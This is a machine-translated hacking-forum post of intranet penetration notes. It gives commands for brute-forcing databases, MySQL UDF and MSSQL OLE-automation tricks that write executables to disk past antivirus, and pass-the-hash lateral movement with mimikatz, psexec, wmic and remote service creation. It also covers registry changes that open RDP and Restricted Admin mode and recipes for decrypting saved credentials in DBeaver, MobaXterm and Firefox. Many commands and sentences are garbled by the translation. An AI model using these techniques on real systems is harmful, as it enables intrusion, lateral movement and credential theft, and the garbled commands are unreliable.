KoreanHackerTeam
Moderator
0x00 环境
Linux 호스트 www 권한 호스트는 외부 네트워크에서 벗어날 수 없습니다. Forward Proxy는 세그먼트 B 인트라넷0x01 收集信息
F-Scrack.py를 사용할 수 없습니다.PS: Scrack.py의 MSSQL 모듈 폭파가 부정확합니다. 직접 간단한 것을 쓸 수 있습니다.
Python scrack.py -H 10.111.1.1-10.111.2.254 -P 3306,5432 -M 200 -T 6
1.Redis
키를 많이 사용하지 마십시오.기본 정보보기 : 마스터, 수량, 버전 번호
스캔을 사용하여 키를보기 3: 스캔 0 일치 * 카운트 100
유형 : 유형 키를 봅니다
해시 유형 : Hetall Key
2.MySQL
Windows에서 먼저 플러그인 디렉토리 :에 쓸 수 있는지 테스트 할 수 있습니다.선택 @@ plugin_dir;
Outfile Plugin_dir에 Hello를 선택하십시오. 그런 다음 MSF와 함께 제공되는 UDF를 사용하여 먼저 16 진수로 변환 한 다음 플러그인 디렉토리 :으로 내 보냅니다.
사용 테스트;
set @a=concat ( '',0xhex_of_exe);
테이블 고스트 생성 (데이터 longblob);
고스트 값에 삽입 ( '');
고스트 세트 데이터 업데이트=@A;
고스트에서 덤프 파일로 데이터를 선택하십시오.
함수 생성 sys_eval은 string soname 'sys_eval.dll'을 반환합니다.
드롭 함수 sys_eval; //사용 후 삭제하고 좋은 습관을 개발하고 먼저 sys_eval을 선택하십시오. sys_exec을 사용하지 마십시오 (충돌합니다)
3.mssql
MSSQL 블라스팅은 움직임이 비교적 커질 것이므로 가능한 한 뒷면에 배치해야합니다.MSSQL 블라스팅이 성공한 후에는 CLR을 사용하여 권한을 얻는 것이 가장 좋습니다. `xp_cmdshell '을 직접 사용하면 직접 죽고 360은이 가로 채게됩니다.
사용자 비밀번호, Certutil 및 기타 MSSQL 도구가 가로 채거나 놀라게 될 것으로 알려져 있습니다. MSSQL에서 제공하는 도구를 사용하여 하드 디스크에 쓸 수 있습니다.
이제 열린 저장 절차 :
SP_CONFIGURE 'Show Advanced Options', 1;
가다
재구성;
가다
SP_CONFIGURE 'OLE 자동화 절차', 1;
가다
재구성; 예를 들어,
mssql写大文件
예를 들어, exe와 다른 것들이 먼저 16 진로 변환 된 다음 파일 :으로 작성됩니다.xxd -plain /tmp/test.exe | tr -d '\ n'/tmp/dll.hex
@HexString varchar (max) 선언;
@HexString='변환 후 16 진'을 설정합니다.
@file varbinary (max) 선언;
set @file=(select cast ( ''as xml)) .Value ( 'xs:HexBinary (substring (sql:variable (' @hexstring '), sql:column ('t.pos '))', 'varbinary (max)')
에서 ( '0x'가 '0x'이후 3 else 0 끝)로 t (pos)) (case substring (@hexstring, 1, 2)));
@file을 선택하십시오;
@init int를 선언하십시오.
@filepath nvarchar (4000)=n'c: \ 22.exe 선언;
exec sp_oacreate 'adodb.stream', @init output; - 생성 된 인스턴스
exec sp_oasetproperty @init, 'type', 1;
exec sp_oamethod @init, 'Open'; - 방법을 호출합니다
exec sp_oamethod @init, '쓰기', null, @file; - 방법을 호출합니다
exec sp_oamethod @init, 'savetofile', null, @filepath, 2; - 방법을 호출합니다
exec sp_oamethod @init, 'close'; - 방법을 호출합니다
exec sp_oadestroy @init; -자원
4.mssql备份
백업 데이터베이스 DB를 닫았습니다to disk='c: \ windows \ temp \ db.bak', 압축, init, stats=5; 볼륨 압축 RAR.EXE A -M0 -V100M C: \ Windows \ Temp \ DB.Split C: \ Windows \ Tasks \ DB.Bak
c: \\ windows \ temp \\ db.split.rar /var /tmp /
6.pth
wmiwmic /node:192.168.1.158 /user3
t007 /password:admin123 프로세스 호출 'Cmd.exe /c. ipconfigd: \ result.txt 'wmiexec.vbs:을 사용하는 것이 좋습니다pentest_study/tools/wmiexec.vbs at master · l3m0n/pentest_study
从零开始内网渗透学习. Contribute to l3m0n/pentest_study development by creating an account on GitHub.
github.com
옵션 표시
Rhost 192.168.81.129를 설정하십시오
SMBPASS 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
SMBUSER 관리자를 설정하십시오
옵션 표시
runmimikatz || Cobalt Strikemimikatz.exe 권한 33333:debug 'sekurlsa333333
th /domain: /user:administrator /ntlm33:2d20d252a479f485cdf5e171d93985bf /run:cmd.exe '//통과 해시 Xecpsexec /acccepteula //라이센스 계약 수락SC 삭제 psexesvc
psexec \\ 192.168.1.185 -u pt007 -p admin123 cmd.exe
psexec.vbscscript psexec.vbs 192.168.1.158 pt007 admin123 'ipconfig'원격 명령 실행 scnet scnet use \\ 192.168.17.138 \ c $ 'admin123' /user
t007순 사용
dir \\ 192.168.17.138 \ c $
복사 test.exe \\ 192.168.17.138 \ c $
Sc \\ 192.168.17.138 테스트 생성 binpath='c: \ test.exe'
SC \\ 192.168.17.138 시작 테스트
SC \\ 192.168.17.138 DEL 테스트
Windows :https://xz.aliyun.com/t/5957에서 CMD를 원격으로 실행하는 9 가지 방법
0x03 access is denied
RID 500이 아닌 컴퓨터의 경우 WMI, PSEXEC 또는 기타 방법을 사용하든 중간 토큰입니다. wmiexec을 사용하면 액세스가 거부됩니다.해시를 크롤링 할 때 레지스트리를 수정하여 모든 로컬 관리자 그룹 구성원이 지속성의 수단으로 원격으로 연결할 수 있도록 수정할 수 있습니다.
reg add add add ad add \ microsoft \ windows \ currentversion \ policies \ system /v localaccounttokenfilterpolicy /t reg_dword /d 1 /f ### rdp의 pth
크롤링 해시를 갈라질 수없는 경우 해시를 사용하여 RDP에 원격으로 로그인하면 로그인 한 시스템은 Windows 8.1 및 Windows Server 2012R2에서 기본적으로 활성화 된 "제한된 관리자 모드"를 활성화해야합니다. Windows 7 및 Winserver 2008에는 2871997 및 2973351 푸딩 설치가 필요합니다.
1.启动RDP
Reg Add 'Hklm \ System \ CurrentControlset \ Control \ Terminal Server' /V fdenytsconnections /t reg_dword /d 00000000 /freg add 'hkey_local_machine \ system \ currentControlset \ Control \ Terminal Server \ Winstations \ rdp-tcp' /v portnumber /t reg_dword /d0x00000d3d /f # 포트 3389 듣기
3389를 켜십시오
wmic /namespace: \\ root \ cimv2 \ terminalservices 경로 Win32_terminalservicesetting 어디 (__class!='') 호출 setallowtsconnections 1
2.开启Restricted Admin mode
Reg ADD 'HKLM \ SYSTEM \ CurrentControlset \ Control \ LSA' /V DisablerEStrictedAdmin /T Reg_dword /D 00000000 /F3.增加防火墙规则
Netsh AdvfiRewall Firewall Add Rule Name='원격 데스크탑'DIR=TCP Localport=3389 동작=3389 작업. #### dbeaverdbeaver6 구성 파일 (스토리지 위치 및 암호 해독 방법은 다른 버전에서 다릅니다) :
#Password 암호화 된 스토리지 위치 :
C: \ Users \ Users \ AppData \ Roaming \ dbeaverdata \ Workspace6 \ General \ .dbeaver \ Credentials-config.json
#URL 및 사용자 이름 :
C: \ Users \ User \ AppData \ Roaming \ dbeaverdata \ Workspace6 \ General \ .dbeaver \ data-sources.json disryption script:https://gist.github.com/felipou/50b60309f99b70b1e28f6d22da5d8f6d222da5d8f6d
Credentials-config.json 스크립트를 다운로드 한 후 Python을 사용하여
ython decrypt.py credentials-config.json을 해독 한 다음 해독 된 ID를 기반으로 Data-Sources.json에서 해당 IP 및 사용자 이름을 검색하십시오.비밀번호의 이전 버전은 :c: \ Users \ Users \ .dbeaver4 \ General \ .dbeaver-data-source.xml에 저장됩니다.http://dbeaver-password-decrypter.s3-website-us-west-2.amazonaws.com/을 사용하여 온라인 암호 해독을 직접 사용할 수 있습니다.
0x04 dump passwod
해당 IP 정보 및 개인 키 주소가있는 .ini 파일이 있습니다.저장소의 오래된 버전 : C: \ 사용자%사용자 이름%\ appdata \ roaming \ mobaxterm
2020 버전 : C: \ 사용자%사용자 이름%\ documents \ mobaxterm
0x05 MobaXterm
Windows의 구성 파일은이 장소에 있습니다 :비
0x05 VSCODE
Master Sanhao는 매우 많이 말했다. 나는 firepwd.py:을 사용하기로 결정했다.Firefox 구성 파일 디렉토리 :
%appdata%\ mozilla \ firefox \ profiles \